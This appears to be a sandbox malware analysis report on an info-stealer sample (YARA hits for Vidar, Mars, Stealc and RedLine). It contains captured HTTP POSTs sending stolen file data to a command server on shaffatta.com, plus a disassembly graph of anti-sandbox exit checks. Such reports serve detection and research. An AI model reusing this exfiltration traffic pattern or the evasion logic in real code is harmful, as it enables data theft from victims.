                                                                                                    2024-05-03 09:21:55 UTC1759OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 43 42 47 49 44 48 43 41 4b 45 42 47 49 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 59 57 6c 68 49 51 56 5a 48 55
                                                                                                    Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xYWlhIQVZHU
                                                                                                    2024-05-03 09:21:55 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:55 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    25192.168.2.449762168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:56 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKF
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1743
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:56 UTC1743OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 41 4b 46 42 47 44 48 49 45 42 47 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 59 57 6c 68 49 51 56 5a 48 55
                                                                                                    Data Ascii: ------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xYWlhIQVZHU
                                                                                                    2024-05-03 09:21:56 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:56 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    26192.168.2.449763168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:57 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1759
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:57 UTC1759OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 42 53 56 68 42 51 31 5a 5a 51
                                                                                                    Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xBSVhBQ1ZZQ
                                                                                                    2024-05-03 09:21:57 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:57 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    27192.168.2.449764168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:21:59 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBA
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1743
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:59 UTC1743OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 42 53 56 68 42 51 31 5a 5a 51
                                                                                                    Data Ascii: ------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xBSVhBQ1ZZQ
                                                                                                    2024-05-03 09:22:00 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:22:00 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    28192.168.2.449765168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:22:00 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1759
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:22:00 UTC1759OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 45 56 45 4a 61 52 30 6c 50 54
                                                                                                    Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xEVEJaR0lPT
                                                                                                    2024-05-03 09:22:01 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:22:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    29192.168.2.449766168.119.248.464436936C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-05-03 09:22:01 UTC201OUTPOST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1743
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:22:01 UTC1743OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 49 45 48 44 48 49 49 49 45 43 41 41 4b 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 4c 51 56 52 42 57 46 70 57 51
                                                                                                    Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xLQVRBWFpWQ
                                                                                                    2024-05-03 09:22:02 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:22:01 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:11:19:53
                                                                                                    Start date:03/05/2024
                                                                                                    Path:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\pYJeC4VJbw.exe"
                                                                                                    Imagebase:0x400000
                                                                                                    File size:358'400 bytes
                                                                                                    MD5 hash:14C3DB1BDBA407C23F0E80BBFDD6DB0F
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2884797147.0000000002D97000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2884177155.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.2489810753.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000003.2489810753.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2884841467.0000000002DC0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2884861560.0000000002DD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.7%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:4.2%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:40
                                                                                                      execution_graph 74730 4136b0 74775 402130 74730->74775 74750 4136f0 74916 414400 GetProcessHeap HeapAlloc GetComputerNameA 74750->74916 74754 413724 74755 416fb0 4 API calls 74754->74755 74756 41372b 74755->74756 74757 416fb0 4 API calls 74756->74757 74758 413732 74757->74758 74759 416fb0 4 API calls 74758->74759 74760 413739 74759->74760 74761 416fb0 4 API calls 74760->74761 74762 413740 74761->74762 74926 416ea0 74762->74926 74764 4137cc 74930 4135e0 GetSystemTime 74764->74930 74765 413749 74765->74764 74768 413782 OpenEventA 74765->74768 74770 4137b5 CloseHandle Sleep 74768->74770 74771 413799 74768->74771 74773 4137ca 74770->74773 74774 4137a1 CreateEventA 74771->74774 74773->74765 74774->74764 75078 4043b0 LocalAlloc 74775->75078 74778 4043b0 2 API calls 74779 40215d 74778->74779 74780 4043b0 2 API calls 74779->74780 74781 402176 74780->74781 74782 4043b0 2 API calls 74781->74782 74783 40218f 74782->74783 74784 4043b0 2 API calls 74783->74784 74785 4021a8 74784->74785 74786 4043b0 2 API calls 74785->74786 74787 4021c1 74786->74787 74788 4043b0 2 API calls 74787->74788 74789 4021da 74788->74789 74790 4043b0 2 API calls 74789->74790 74791 4021f3 74790->74791 74792 4043b0 2 API calls 74791->74792 74793 40220c 74792->74793 74794 4043b0 2 API calls 74793->74794 74795 402225 74794->74795 74796 4043b0 2 API calls 74795->74796 74797 40223e 74796->74797 74798 4043b0 2 API calls 74797->74798 74799 402257 74798->74799 74800 4043b0 2 API calls 74799->74800 74801 402270 74800->74801 74802 4043b0 2 API calls 74801->74802 74803 402289 74802->74803 74804 4043b0 2 API calls 74803->74804 74805 4022a2 74804->74805 74806 4043b0 2 API calls 74805->74806 74807 4022bb 74806->74807 74808 4043b0 2 API calls 74807->74808 74809 4022d4 74808->74809 74810 4043b0 2 API calls 74809->74810 74811 4022ed 74810->74811 74812 4043b0 2 API calls 74811->74812 74813 402306 74812->74813 74814 4043b0 2 API calls 74813->74814 74815 40231f 74814->74815 74816 4043b0 2 API calls 74815->74816 74817 402338 74816->74817 74818 4043b0 2 API calls 74817->74818 74819 402351 74818->74819 74820 4043b0 2 API calls 74819->74820 74821 40236a 74820->74821 74822 4043b0 2 API calls 74821->74822 74823 402383 74822->74823 74824 4043b0 2 API calls 74823->74824 74825 40239c 74824->74825 74826 4043b0 2 API calls 74825->74826 74827 4023b5 74826->74827 74828 4043b0 2 API calls 74827->74828 74829 4023ce 74828->74829 74830 4043b0 2 API calls 74829->74830 74831 4023e7 74830->74831 74832 4043b0 2 API calls 74831->74832 74833 402400 74832->74833 74834 4043b0 2 API calls 74833->74834 74835 402419 74834->74835 74836 4043b0 2 API calls 74835->74836 74837 402432 74836->74837 74838 4043b0 2 API calls 74837->74838 74839 40244b 74838->74839 74840 4043b0 2 API calls 74839->74840 74841 402464 74840->74841 74842 4043b0 2 API calls 74841->74842 74843 40247d 74842->74843 74844 4043b0 2 API calls 74843->74844 74845 402496 74844->74845 74846 4043b0 2 API calls 74845->74846 74847 4024af 74846->74847 74848 4043b0 2 API calls 74847->74848 74849 4024c8 74848->74849 74850 4043b0 2 API calls 74849->74850 74851 4024e1 74850->74851 74852 4043b0 2 API calls 74851->74852 74853 4024fa 74852->74853 74854 4043b0 2 API calls 74853->74854 74855 402513 74854->74855 74856 4043b0 2 API calls 74855->74856 74857 40252c 74856->74857 74858 4043b0 2 API calls 74857->74858 74859 402545 74858->74859 74860 4043b0 2 API calls 74859->74860 74861 40255e 74860->74861 74862 415ed0 74861->74862 75082 415dc0 GetPEB 74862->75082 74864 415ed8 74865 416103 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 74864->74865 74866 415eea 74864->74866 74867 416164 GetProcAddress 74865->74867 74868 41617d 74865->74868 74869 415efc 21 API calls 74866->74869 74867->74868 74870 4161b6 74868->74870 74871 416186 GetProcAddress GetProcAddress 74868->74871 74869->74865 74872 4161d8 74870->74872 74873 4161bf GetProcAddress 74870->74873 74871->74870 74874 4161e1 GetProcAddress 74872->74874 74875 4161f9 74872->74875 74873->74872 74874->74875 74876 4136c0 74875->74876 74877 416202 GetProcAddress GetProcAddress 74875->74877 74878 416d40 74876->74878 74877->74876 74879 416d50 74878->74879 74880 4136cd 74879->74880 74881 416d7e lstrcpy 74879->74881 74882 401190 74880->74882 74881->74880 74883 4011a8 74882->74883 74884 4011d7 74883->74884 74885 4011cf ExitProcess 74883->74885 74886 401120 GetSystemInfo 74884->74886 74887 401144 74886->74887 74888 40113c ExitProcess 74886->74888 74889 4010d0 GetCurrentProcess VirtualAllocExNuma 74887->74889 74890 401101 ExitProcess 74889->74890 74891 401109 74889->74891 75083 401060 VirtualAlloc 74891->75083 74894 4011e0 75087 415090 74894->75087 74897 401209 __aulldiv 74898 40125a 74897->74898 74899 401252 ExitProcess 74897->74899 74900 413430 GetUserDefaultLangID 74898->74900 74901 413493 74900->74901 74902 413452 74900->74902 74908 401150 74901->74908 74902->74901 74903 413481 ExitProcess 74902->74903 74904 413463 ExitProcess 74902->74904 74905 413477 ExitProcess 74902->74905 74906 41348b ExitProcess 74902->74906 74907 41346d ExitProcess 74902->74907 74906->74901 74909 414400 3 API calls 74908->74909 74910 40115e 74909->74910 74911 40118c 74910->74911 75089 4143c0 GetProcessHeap HeapAlloc GetUserNameA 74910->75089 74915 4143c0 GetProcessHeap HeapAlloc GetUserNameA 74911->74915 74913 401177 74913->74911 74914 401184 ExitProcess 74913->74914 74915->74750 74917 413703 74916->74917 74918 416fb0 74917->74918 75090 416d10 74918->75090 74920 416fc1 lstrlen 74922 416fe0 74920->74922 74921 417018 75091 416da0 74921->75091 74922->74921 74925 416ffa lstrcpy lstrcat 74922->74925 74924 417024 74924->74754 74925->74921 74927 416ebb 74926->74927 74928 416f0b 74927->74928 74929 416ef9 lstrcpy 74927->74929 74928->74765 74929->74928 75095 4134e0 74930->75095 74932 41364e 74933 413658 sscanf 74932->74933 75124 416e00 74933->75124 74935 41366a SystemTimeToFileTime SystemTimeToFileTime 74936 4136a0 74935->74936 74937 41368e 74935->74937 74939 412bb0 74936->74939 74937->74936 74938 413698 ExitProcess 74937->74938 74940 412bbd 74939->74940 74941 416d40 lstrcpy 74940->74941 74942 412bcb 74941->74942 75126 416e20 lstrlen 74942->75126 74945 416e20 2 API calls 74946 412bed 74945->74946 74947 416e20 2 API calls 74946->74947 74948 412bfa 74947->74948 74949 416e20 2 API calls 74948->74949 74950 412c07 74949->74950 75130 402590 74950->75130 74955 416e20 2 API calls 74956 412cd5 74955->74956 74957 416fb0 4 API calls 74956->74957 74958 412ceb 74957->74958 74959 416ea0 lstrcpy 74958->74959 74960 412cf4 74959->74960 74961 416d40 lstrcpy 74960->74961 74962 412d11 74961->74962 74963 416fb0 4 API calls 74962->74963 74964 412d2a 74963->74964 74965 416ea0 lstrcpy 74964->74965 74966 412d36 74965->74966 74967 416fb0 4 API calls 74966->74967 74968 412d5a 74967->74968 74969 416ea0 lstrcpy 74968->74969 74970 412d66 74969->74970 74971 416d40 lstrcpy 74970->74971 74972 412d8b 74971->74972 75774 4141c0 GetWindowsDirectoryA 74972->75774 74975 416da0 lstrcpy 74976 412da2 74975->74976 75784 404540 74976->75784 74978 412da8 75929 40fae0 74978->75929 74980 412db0 74981 416d40 lstrcpy 74980->74981 74982 412dd3 74981->74982 75947 401500 74982->75947 74986 412de7 76102 40f3b0 74986->76102 74988 412def 74989 416d40 lstrcpy 74988->74989 74990 412e13 74989->74990 74991 401500 lstrcpy 74990->74991 74992 412e21 74991->74992 74993 405610 37 API calls 74992->74993 74994 412e27 74993->74994 76109 40f200 74994->76109 74996 412e2f 74997 401500 lstrcpy 74996->74997 74998 412e40 74997->74998 76119 40fd10 74998->76119 75000 412e45 75001 416d40 lstrcpy 75000->75001 75002 412e5e 75001->75002 76463 404c70 GetProcessHeap RtlAllocateHeap InternetOpenA 75002->76463 75004 412e63 75005 401500 lstrcpy 75004->75005 75006 412ed0 75005->75006 76470 40ef80 75006->76470 75008 412ed5 75009 416d40 lstrcpy 75008->75009 75010 412ef8 75009->75010 75011 401500 lstrcpy 75010->75011 75012 412f06 75011->75012 75013 405610 37 API calls 75012->75013 75014 412f0c 75013->75014 76523 40f4d0 75014->76523 75079 4043db 75078->75079 75080 4043ec strlen 75079->75080 75081 402144 75079->75081 75080->75079 75081->74778 75082->74864 75084 401082 ctype 75083->75084 75085 4010bd 75084->75085 75086 4010a2 VirtualFree 75084->75086 75085->74894 75086->75085 75088 4011f3 GlobalMemoryStatusEx 75087->75088 75088->74897 75089->74913 75090->74920 75092 416dc2 75091->75092 75093 416dec 75092->75093 75094 416dda lstrcpy 75092->75094 75093->74924 75094->75093 75096 416d40 lstrcpy 75095->75096 75097 4134f3 75096->75097 75098 416fb0 4 API calls 75097->75098 75099 413505 75098->75099 75100 416ea0 lstrcpy 75099->75100 75101 41350e 75100->75101 75102 416fb0 4 API calls 75101->75102 75103 413527 75102->75103 75104 416ea0 lstrcpy 75103->75104 75105 413530 75104->75105 75106 416fb0 4 API calls 75105->75106 75107 41354a 75106->75107 75108 416ea0 lstrcpy 75107->75108 75109 413553 75108->75109 75110 416fb0 4 API calls 75109->75110 75111 41356c 75110->75111 75112 416ea0 lstrcpy 75111->75112 75113 413575 75112->75113 75114 416fb0 4 API calls 75113->75114 75115 41358f 75114->75115 75116 416ea0 lstrcpy 75115->75116 75117 413598 75116->75117 75118 416fb0 4 API calls 75117->75118 75119 4135b3 75118->75119 75120 416ea0 lstrcpy 75119->75120 75121 4135bc 75120->75121 75122 416da0 lstrcpy 75121->75122 75123 4135d0 75122->75123 75123->74932 75125 416e12 75124->75125 75125->74935 75127 416e3f 75126->75127 75128 412be0 75127->75128 75129 416e7b lstrcpy 75127->75129 75128->74945 75129->75128 75131 4043b0 2 API calls 75130->75131 75132 4025a4 75131->75132 75133 4043b0 2 API calls 75132->75133 75134 4025bd 75133->75134 75135 4043b0 2 API calls 75134->75135 75136 4025d6 75135->75136 75137 4043b0 2 API calls 75136->75137 75138 4025ef 75137->75138 75139 4043b0 2 API calls 75138->75139 75140 402608 75139->75140 75141 4043b0 2 API calls 75140->75141 75142 402621 75141->75142 75143 4043b0 2 API calls 75142->75143 75144 40263a 75143->75144 75145 4043b0 2 API calls 75144->75145 75146 402653 75145->75146 75147 4043b0 2 API calls 75146->75147 75148 40266c 75147->75148 75149 4043b0 2 API calls 75148->75149 75150 402685 75149->75150 75151 4043b0 2 API calls 75150->75151 75152 40269e 75151->75152 75153 4043b0 2 API calls 75152->75153 75154 4026b7 75153->75154 75155 4043b0 2 API calls 75154->75155 75156 4026d0 75155->75156 75157 4043b0 2 API calls 75156->75157 75158 4026e9 75157->75158 75159 4043b0 2 API calls 75158->75159 75160 402702 75159->75160 75161 4043b0 2 API calls 75160->75161 75162 40271b 75161->75162 75163 4043b0 2 API calls 75162->75163 75164 402734 75163->75164 75165 4043b0 2 API calls 75164->75165 75166 40274d 75165->75166 75167 4043b0 2 API calls 75166->75167 75168 402766 75167->75168 75169 4043b0 2 API calls 75168->75169 75170 40277f 75169->75170 75171 4043b0 2 API calls 75170->75171 75172 402798 75171->75172 75173 4043b0 2 API calls 75172->75173 75174 4027b1 75173->75174 75175 4043b0 2 API calls 75174->75175 75176 4027ca 75175->75176 75177 4043b0 2 API calls 75176->75177 75178 4027e3 75177->75178 75179 4043b0 2 API calls 75178->75179 75180 4027fc 75179->75180 75181 4043b0 2 API calls 75180->75181 75182 402815 75181->75182 75183 4043b0 2 API calls 75182->75183 75184 40282e 75183->75184 75185 4043b0 2 API calls 75184->75185 75186 402847 75185->75186 75187 4043b0 2 API calls 75186->75187 75188 402860 75187->75188 75189 4043b0 2 API calls 75188->75189 75190 402879 75189->75190 75191 4043b0 2 API calls 75190->75191 75192 402892 75191->75192 75193 4043b0 2 API calls 75192->75193 75194 4028ab 75193->75194 75195 4043b0 2 API calls 75194->75195 75196 4028c4 75195->75196 75197 4043b0 2 API calls 75196->75197 75198 4028dd 75197->75198 75199 4043b0 2 API calls 75198->75199 75200 4028f6 75199->75200 75201 4043b0 2 API calls 75200->75201 75202 40290f 75201->75202 75203 4043b0 2 API calls 75202->75203 75204 402928 75203->75204 75205 4043b0 2 API calls 75204->75205 75206 402941 75205->75206 75207 4043b0 2 API calls 75206->75207 